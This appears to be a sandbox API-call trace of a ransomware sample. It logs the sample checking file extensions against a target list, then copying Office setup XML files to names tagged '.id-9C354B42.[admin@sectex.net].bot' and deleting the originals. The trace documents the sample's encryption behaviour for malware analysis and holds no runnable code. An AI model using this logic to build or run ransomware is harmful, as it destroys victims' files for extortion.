	[0038.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104
	[0038.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104
	[0038.670] lstrlenW (lpString=".doc") returned 4
	[0038.670] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.670] lstrlenW (lpString=".docx") returned 5
	[0038.670] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0038.670] lstrlenW (lpString=".pdf") returned 4
	[0038.670] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.670] lstrlenW (lpString=".xls") returned 4
	[0038.670] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.670] lstrlenW (lpString=".xlsx") returned 5
	[0038.670] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0038.670] lstrlenW (lpString=".ppt") returned 4
	[0038.670] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.670] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104
	[0038.670] lstrlenW (lpString=".zip") returned 4
	[0038.670] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.670] lstrlenW (lpString=".rar") returned 4
	[0038.670] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.670] lstrlenW (lpString=".bz2") returned 4
	[0038.671] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.671] lstrlenW (lpString=".7z") returned 3
	[0038.671] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104
	[0038.671] lstrlenW (lpString=".dbf") returned 4
	[0038.671] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104
	[0038.671] lstrlenW (lpString=".1cd") returned 4
	[0038.671] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104
	[0038.671] lstrlenW (lpString=".jpg") returned 4
	[0038.671] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104
	[0038.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104
	[0038.671] lstrlenW (lpString=".doc") returned 4
	[0038.671] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.671] lstrlenW (lpString=".docx") returned 5
	[0038.671] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0038.671] lstrlenW (lpString=".pdf") returned 4
	[0038.671] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.671] lstrlenW (lpString=".xls") returned 4
	[0038.671] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.671] lstrlenW (lpString=".xlsx") returned 5
	[0038.671] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0038.671] lstrlenW (lpString=".ppt") returned 4
	[0038.671] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104
	[0038.671] lstrlenW (lpString=".zip") returned 4
	[0038.671] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.671] lstrlenW (lpString=".rar") returned 4
	[0038.671] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.671] lstrlenW (lpString=".bz2") returned 4
	[0038.671] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.671] lstrlenW (lpString=".7z") returned 3
	[0038.671] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104
	[0038.672] lstrlenW (lpString=".dbf") returned 4
	[0038.672] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104
	[0038.672] lstrlenW (lpString=".1cd") returned 4
	[0038.672] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104
	[0038.672] lstrlenW (lpString=".jpg") returned 4
	[0038.672] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.672] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0038.672] lstrlenW (lpString="PrjProrWW.XML") returned 13
	[0038.672] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0038.673] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=6421) returned 1
	[0038.673] CloseHandle (hObject=0x1a0) returned 1
	[0038.673] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml")) returned 0x20
	[0038.673] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0038.673] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0038.673] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.673] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.673] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0038.674] GetLastError () returned 0x0
	[0038.674] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x1915, lpOverlapped=0x0) returned 1
	[0038.675] WriteFile (in: hFile=0x1c0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x1920, lpOverlapped=0x0) returned 1
	[0038.679] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0038.679] WriteFile (in: hFile=0x1c0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xee, lpOverlapped=0x0) returned 1
	[0038.679] SetEndOfFile (hFile=0x1c0) returned 1
	[0038.679] CloseHandle (hObject=0x1c0) returned 1
	[0038.680] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.680] SetEndOfFile (hFile=0x1a0) returned 1
	[0038.680] CloseHandle (hObject=0x1a0) returned 1
	[0038.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0038.681] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml")) returned 1
	[0038.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101
	[0038.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101
	[0038.681] lstrlenW (lpString=".doc") returned 4
	[0038.681] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.681] lstrlenW (lpString=".docx") returned 5
	[0038.681] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1
	[0038.681] lstrlenW (lpString=".pdf") returned 4
	[0038.681] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.681] lstrlenW (lpString=".xls") returned 4
	[0038.681] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.681] lstrlenW (lpString=".xlsx") returned 5
	[0038.681] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1
	[0038.681] lstrlenW (lpString=".ppt") returned 4
	[0038.681] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101
	[0038.681] lstrlenW (lpString=".zip") returned 4
	[0038.681] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.681] lstrlenW (lpString=".rar") returned 4
	[0038.681] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.682] lstrlenW (lpString=".bz2") returned 4
	[0038.682] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.682] lstrlenW (lpString=".7z") returned 3
	[0038.682] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101
	[0038.682] lstrlenW (lpString=".dbf") returned 4
	[0038.682] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101
	[0038.682] lstrlenW (lpString=".1cd") returned 4
	[0038.682] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101
	[0038.682] lstrlenW (lpString=".jpg") returned 4
	[0038.682] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101
	[0038.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101
	[0038.682] lstrlenW (lpString=".doc") returned 4
	[0038.682] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.682] lstrlenW (lpString=".docx") returned 5
	[0038.682] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1
	[0038.682] lstrlenW (lpString=".pdf") returned 4
	[0038.682] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.682] lstrlenW (lpString=".xls") returned 4
	[0038.682] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.682] lstrlenW (lpString=".xlsx") returned 5
	[0038.682] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1
	[0038.682] lstrlenW (lpString=".ppt") returned 4
	[0038.682] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101
	[0038.682] lstrlenW (lpString=".zip") returned 4
	[0038.682] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.682] lstrlenW (lpString=".rar") returned 4
	[0038.682] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.682] lstrlenW (lpString=".bz2") returned 4
	[0038.682] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.683] lstrlenW (lpString=".7z") returned 3
	[0038.683] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101
	[0038.683] lstrlenW (lpString=".dbf") returned 4
	[0038.683] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101
	[0038.683] lstrlenW (lpString=".1cd") returned 4
	[0038.683] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101
	[0038.683] lstrlenW (lpString=".jpg") returned 4
	[0038.683] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.683] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0038.683] lstrlenW (lpString="SETUP.XML") returned 9
	[0038.683] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0038.684] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=16683) returned 1
	[0038.684] CloseHandle (hObject=0x1a0) returned 1
	[0038.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml")) returned 0x20
	[0038.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0038.684] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0038.684] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.684] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.684] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0038.686] GetLastError () returned 0x0
	[0038.686] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x412b, lpOverlapped=0x0) returned 1
	[0038.688] WriteFile (in: hFile=0x1c0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x4130, lpOverlapped=0x0) returned 1
	[0038.689] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0038.689] WriteFile (in: hFile=0x1c0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0038.689] SetEndOfFile (hFile=0x1c0) returned 1
	[0038.689] CloseHandle (hObject=0x1c0) returned 1
	[0038.690] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.690] SetEndOfFile (hFile=0x1a0) returned 1
	[0038.691] CloseHandle (hObject=0x1a0) returned 1
	[0038.691] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0038.691] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml")) returned 1
	[0038.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97
	[0038.691] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97
	[0038.691] lstrlenW (lpString=".doc") returned 4
	[0038.691] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.691] lstrlenW (lpString=".docx") returned 5
	[0038.691] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0038.691] lstrlenW (lpString=".pdf") returned 4
	[0038.691] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.691] lstrlenW (lpString=".xls") returned 4
	[0038.692] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.692] lstrlenW (lpString=".xlsx") returned 5
	[0038.692] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0038.692] lstrlenW (lpString=".ppt") returned 4
	[0038.692] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97
	[0038.692] lstrlenW (lpString=".zip") returned 4
	[0038.692] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.692] lstrlenW (lpString=".rar") returned 4
	[0038.692] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.692] lstrlenW (lpString=".bz2") returned 4
	[0038.692] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.692] lstrlenW (lpString=".7z") returned 3
	[0038.692] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97
	[0038.692] lstrlenW (lpString=".dbf") returned 4
	[0038.692] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97
	[0038.692] lstrlenW (lpString=".1cd") returned 4
	[0038.692] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97
	[0038.692] lstrlenW (lpString=".jpg") returned 4
	[0038.692] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97
	[0038.692] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97
	[0038.692] lstrlenW (lpString=".doc") returned 4
	[0038.692] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.692] lstrlenW (lpString=".docx") returned 5
	[0038.692] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0038.692] lstrlenW (lpString=".pdf") returned 4
	[0038.692] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.692] lstrlenW (lpString=".xls") returned 4
	[0038.692] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.692] lstrlenW (lpString=".xlsx") returned 5
	[0038.692] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0038.693] lstrlenW (lpString=".ppt") returned 4
	[0038.693] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97
	[0038.693] lstrlenW (lpString=".zip") returned 4
	[0038.693] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.693] lstrlenW (lpString=".rar") returned 4
	[0038.693] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.693] lstrlenW (lpString=".bz2") returned 4
	[0038.693] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.693] lstrlenW (lpString=".7z") returned 3
	[0038.693] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97
	[0038.693] lstrlenW (lpString=".dbf") returned 4
	[0038.693] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97
	[0038.693] lstrlenW (lpString=".1cd") returned 4
	[0038.693] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.693] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97
	[0038.693] lstrlenW (lpString=".jpg") returned 4
	[0038.693] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.693] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0038.693] lstrlenW (lpString="ProjectMUI.XML") returned 14
	[0038.693] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0038.693] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=1452) returned 1
	[0038.694] CloseHandle (hObject=0x1a0) returned 1
	[0038.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml")) returned 0x20
	[0038.694] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0038.694] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0038.694] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.694] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.694] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0038.696] GetLastError () returned 0x0
	[0038.696] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x5ac, lpOverlapped=0x0) returned 1
